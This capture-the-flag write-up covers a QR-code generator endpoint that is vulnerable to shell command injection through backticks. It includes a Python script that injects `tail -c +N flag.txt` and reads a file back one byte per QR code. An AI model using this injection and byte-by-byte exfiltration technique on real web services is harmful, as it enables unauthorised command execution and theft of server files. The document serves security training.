The website is simple: we input some text, it is sent to a URL, and that URL generates a QR code of what we entered. Sadly, only the first character of our input actually ends up in the QR code. More on this later.
I decided to cut out the middleman and go straight to /qr?text=<insert text here> for ease. I found that putting backticks inside the text caused an error.
A little research tells you that backticks are command substitution in bash (the enclosed text is run in a subshell and its output spliced back in), and PHP's backtick operator does the same thing through shell_exec. So there is probably a horribly filtered system() or eval call going on there, which lets us execute code by wrapping it in backticks: `command`.
We find that the output of the command is actually stored in the QR code! Huzzah! cat flag.txt it is!
Except...
It still only takes the first character.
I wrote a nice little script that uses tail to grab bytes of the flag at different positions, automating the QR code scan with zbarimg. It didn't error like some other commands did.
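Here is how that one-byte-per-request loop can be put together. This is an added example, not the writeup's own script: it assumes the endpoint /qr?text=, a file named flag.txt on the target, and a constructed placeholder flag that only the offline simulator uses (the real challenge flag is not on this page). The live path fetches the PNG with urllib and decodes it with zbarimg -q --raw; the simulator reproduces the server behaviour the writeup observed (substitute the backtick command, then keep only the first character) so the loop can be exercised without the target.

```python
"""Recover a file one byte per request through a first-character-only QR oracle.

Added example, not the original writeup's script. Assumed: the /qr?text=
endpoint, the file name flag.txt, and CONSTRUCTED_FLAG (offline simulator only).
"""
import re
import subprocess
import tempfile
import urllib.parse
import urllib.request

TARGET = "http://challenge.example/qr?text="  # assumed base URL, not from the page


def payload(pos: int) -> str:
    """Backtick command whose first output byte is byte `pos` (1-indexed) of flag.txt.

    `tail -c +N` prints the file starting at byte N, so the server's
    "first character only" truncation hands back exactly that byte.
    """
    return f"`tail -c +{pos} flag.txt`"


def build_url(pos: int) -> str:
    # quote(..., safe="") turns '+' into %2B and ' ' into %20. A bare '+' in a
    # query string is decoded as a space by PHP, which would mangle the tail
    # argument, so the payload must be percent-encoded rather than pasted in.
    return TARGET + urllib.parse.quote(payload(pos), safe="")


def fetch_and_decode(pos: int) -> str:
    """Live oracle: download the QR PNG for position `pos` and decode it with zbarimg."""
    with urllib.request.urlopen(build_url(pos), timeout=10) as resp:
        if resp.status != 200:
            raise RuntimeError(f"position {pos}: HTTP {resp.status}")
        png = resp.read()
    with tempfile.NamedTemporaryFile(suffix=".png") as tmp:
        tmp.write(png)
        tmp.flush()
        # -q: no summary line; --raw: print the symbol data without a "QR-Code:" prefix.
        out = subprocess.run(["zbarimg", "-q", "--raw", tmp.name],
                             capture_output=True, text=True)
    if out.returncode != 0:  # 4 = no symbol found, 1 = error
        raise RuntimeError(f"position {pos}: zbarimg failed: {out.stderr.strip()}")
    # zbarimg appends one newline after the symbol; strip only that one so a
    # decoded "\n" byte is still distinguishable from "nothing decoded".
    return out.stdout[:-1] if out.stdout.endswith("\n") else out.stdout


# Constructed placeholder for the offline simulator; not the challenge's flag.
CONSTRUCTED_FLAG = b"flag{constructed_example_only}\n"


def simulated_oracle(text: str) -> str:
    """Offline stand-in for the vulnerable endpoint, limited to the tail payload.

    Mirrors the observed behaviour: the backtick command is substituted first,
    then only the first character of the result survives.
    """
    m = re.fullmatch(r"`tail -c \+(\d+) flag\.txt`", text)
    if not m:
        raise ValueError("simulator only understands the tail payload")
    start = int(m.group(1))
    if start < 1:
        raise ValueError("tail -c +N needs N >= 1")
    output = CONSTRUCTED_FLAG[start - 1:]
    return output[:1].decode("latin-1")


def recover_flag(oracle, max_len: int = 128) -> str:
    """Ask `oracle(pos)` for one byte at a time until it returns nothing (EOF)."""
    chars = []
    for pos in range(1, max_len + 1):
        ch = oracle(pos)
        if ch == "":  # tail ran off the end of the file
            break
        chars.append(ch)
    return "".join(chars).rstrip("\n")


if __name__ == "__main__":
    # Offline demonstration against the simulator; swap in fetch_and_decode for the target.
    print(recover_flag(lambda pos: simulated_oracle(payload(pos))))
```

The live fetcher raises on a non-200 response or a zbarimg failure instead of returning an empty string, so a filtered or broken command is reported as an error rather than being mistaken for the end of the file.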
The first two characters were rt, so I took a wild guess.